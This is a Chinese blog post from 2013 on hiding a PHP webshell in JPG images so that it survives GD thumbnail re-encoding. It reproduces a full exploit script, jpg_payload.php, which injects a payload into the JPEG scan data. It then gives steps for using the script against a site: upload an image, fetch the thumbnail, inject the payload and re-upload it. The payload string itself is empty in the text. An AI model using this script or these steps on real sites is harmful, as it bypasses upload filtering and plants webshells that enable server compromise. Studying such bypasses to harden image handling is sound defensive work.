突破php的imagecopyresampled 和imagecopyresized 实现图片马JPG

编辑器加载中...之前有人发布了 利用PNG 图片上述压缩函数的方法 原理利用 PNG的结构IDAT chunks填充一句话webshell,并进行一套取模运算 详见: https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/ 但是受限于 图像的尺寸 必须320×320 且必须是PNG格式 那JPG怎么办 神奇的老外 提出了列方法 In case of successful injection you will get a specially crafted image, which should be uploaded again. Since the most straightforward injection method is used, the following problems can occur: 1) After the second processing the injected data may become partially corrupted. 2) The jpg_payload.php script outputs "Something's wrong". If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another initial image. Sergey Bobrov @Black2Fan. See also: https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/ */ $miniPayload = ''; if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) { die('php-gd is not installed'); } if(!isset($argv[1])) { die('php jpg_payload.php '); } set_error_handler("custom_error_handler"); for($pad = 0; $pad < 1024; $pad++) { $nullbytePayloadSize = $pad; $dis = new DataInputStream($argv[1]); $outStream = file_get_contents($argv[1]); $extraBytes = 0; $correctImage = TRUE; if($dis->readShort() != 0xFFD8) { die('Incorrect SOI marker'); } while((!$dis->eof()) && ($dis->readByte() == 0xFF)) { $marker = $dis->readByte(); $size = $dis->readShort() - 2; $dis->skip($size); if($marker === 0xDA) { $startPos = $dis->seek(); $outStreamTmp = substr($outStream, 0, $startPos) . $miniPayload . str_repeat("\0",$nullbytePayloadSize) . substr($outStream, $startPos); checkImage('_'.$argv[1], $outStreamTmp, TRUE); if($extraBytes !== 0) { while((!$dis->eof())) { if($dis->readByte() === 0xFF) { if($dis->readByte !== 0x00) { break; } } } $stopPos = $dis->seek() - 2; $imageStreamSize = $stopPos - $startPos; $outStream = substr($outStream, 0, $startPos) . $miniPayload . substr( str_repeat("\0",$nullbytePayloadSize). substr($outStream, $startPos, $imageStreamSize), 0, $nullbytePayloadSize+$imageStreamSize-$extraBytes) . substr($outStream, $stopPos); } elseif($correctImage) { $outStream = $outStreamTmp; } else { break; } if(checkImage('payload_'.$argv[1], $outStream)) { die('Success!'); } else { break; } } } } unlink('payload_'.$argv[1]); die('Something\'s wrong'); function checkImage($filename, $data, $unlink = FALSE) { global $correctImage; file_put_contents($filename, $data); $correctImage = TRUE; imagecreatefromjpeg($filename); if($unlink) unlink($filename); return $correctImage; } function custom_error_handler($errno, $errstr, $errfile, $errline) { global $extraBytes, $correctImage; $correctImage = FALSE; if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) { if(isset($m[1])) { $extraBytes = (int)$m[1]; } } } class DataInputStream { private $binData; private $order; private $size; public function __construct($filename, $order = false, $fromString = false) { $this->binData = ''; $this->order = $order; if(!$fromString) { if(!file_exists($filename) || !is_file($filename)) die('File not exists ['.$filename.']'); $this->binData = file_get_contents($filename); } else { $this->binData = $filename; } $this->size = strlen($this->binData); } public function seek() { return ($this->size - strlen($this->binData)); } public function skip($skip) { $this->binData = substr($this->binData, $skip); } public function readByte() { if($this->eof()) { die('End Of File'); } $byte = substr($this->binData, 0, 1); $this->binData = substr($this->binData, 1); return ord($byte); } public function readShort() { if(strlen($this->binData) < 2) { die('End Of File'); } $short = substr($this->binData, 0, 2); $this->binData = substr($this->binData, 2); if($this->order) { $short = (ord($short[1]) << 8) + ord($short[0]); } else { $short = (ord($short[0]) << 8) + ord($short[1]); } return $short; } public function eof() { return !$this->binData||(strlen($this->binData) === 0); } } ?> http://pastebin.com/3cznqi8P 具体方法 时: 1. 你先要 上传你想要构造的图片马原片 2. 等网站生成完缩略图下载下来 3. 用上述脚本 生成带图片的 木马 4. 重新上传到网站 结束 这个也要看运气成分
posted @ 2013-10-08 05:48  heikeboy’s Blog  阅读(316)  评论(0编辑  收藏  举报